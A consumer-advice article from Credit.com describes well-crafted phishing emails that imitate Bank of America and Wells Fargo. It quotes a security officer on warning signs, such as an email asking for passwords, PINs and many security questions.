The information provided on this website does not, and is not intended to, act as legal, financial or credit advice; instead, it is for general informational purposes only. Information on this website may not be current. This website may contain links to other third-party websites. Such links are only for the convenience of the reader, user or browser; we do not recommend or endorse the contents of any third-party sites. Readers of this website should contact their attorney, accountant or credit counselor to obtain advice with respect to their particular situation. No reader, user, or browser of this site should act or not act on the basis of information on this site. Always seek personal legal, financial or credit advice for your relevant jurisdiction. Only your individual attorney or advisor can provide assurances that the information contained herein – and your interpretation of it – is applicable or appropriate to your particular situation. Use of, and access to, this website or any of the links or resources contained within the site do not create an attorney-client or fiduciary relationship between the reader, user, or browser and website owner, authors, contributors, contributing firms, or their respective employers.
Credit.com receives compensation for the financial products and services advertised on this site if our users apply for and sign up for any of them. Compensation is not a factor in the substantive evaluation of any product.
Maybe you think you can spot scam emails by the broken English, the pleas to wire money via Western Union and the references to Nigerian princes. Think again. The latest phishing attacks are so well-crafted, they look exactly like emails you might receive from major banks like Wells Fargo and Bank of America, says Ondrej Krehel, information security officer at Identity Theft 911, Credit.com’s sister company.
“It’s very sophisticated,” Krehel says. “Hackers are creating these pages to look exactly like professionally crafted bank pages. So it does have the look and feel and touch of your bank’s website.”
One recent email was noteworthy simply because it managed to sneak past Identity Theft 911’s multiple firewalls and land in Krehel’s inbox. It appeared to come from Bank of America, even using a real no-reply email address from the bank itself as the sender, as opposed to an obvious fake like Hotmail or Yahoo.com.
Once opened, the email doesn’t deploy any malware to steal users’ passwords or snoop their computers (such malicious code would have been blocked by Krehel’s firewall). Instead, it informs the user that there’s been a serious problem with her account, and she needs to complete and return the attached form.
“The text of the email is very well crafted,” Krehel says. “It looks like something Bank of America would actually send you.”
The scammers didn’t even include any malware in the attachment, since that also would sound alarms within users’ anti-spyware programs. Instead, the attachment looks just like a page created by Bank of America itself.
The real Bank of America logo appears across the top of the file—clicking on it takes the user to the bank’s actual site. The color scheme, with red and grey horizontal ribbons, and numbers in blue circles, precisely mimics the look of all the bank’s other communications. Even the mix of methods to input information, with drag-down boxes, checkboxes and places to type in text, are crafted exactly like the real thing.
The hackers are so good, in fact, that they customize the attachments to different banks. Another attachment Krehel received a few months ago had the exact same level of detail, only it spoofed the look and feel of Wells Fargo’s website.
“This is about collecting users’ data, and not triggering any antivirus” software, Krehel says. “So it’s the user driving the action.”
The attachment asks users to input all the information about their accounts, including their passwords, PINs, birthdates, Social Security numbers, driver’s license numbers, and the maiden and middle name of their mothers, plus six different security challenge questions, such as “Your first pet’s name.”
This, actually, is one clue to figuring out that it’s a scam, Krehel says. Banks may occasionally ask customers to verify information about a certain transaction. If you’ve never been to Hong Kong but suddenly your credit card goes on a shopping spree there, you might get a phone call from Bank of America, or an email asking you to call the bank. But banks never, ever, ask customers to confirm the security details of their accounts via email.
“If they have a problem with the account itself, they’ll probably shut down the account entirely and call the person, or email them and ask them to call a secure number,” Krehel says.
Second, the sheer number of security questions should raise alarm bells in the user’s mind, Krehel says. The one purporting to be from Bank of America even asked for the user’s email password and their father’s middle name, information that Bank of America itself does not need to know.
“It’s just overkill, the number of questions asked in one email,” says Krehel.
The takeaway: Phishing scammers are getting a lot more sophisticated. Here are some tips to avoid getting scammed:
Image: zetrules, via Flickr.com
October 19, 2023
Identity Theft and Scams
May 17, 2022
Identity Theft and Scams
May 20, 2021
Identity Theft and Scams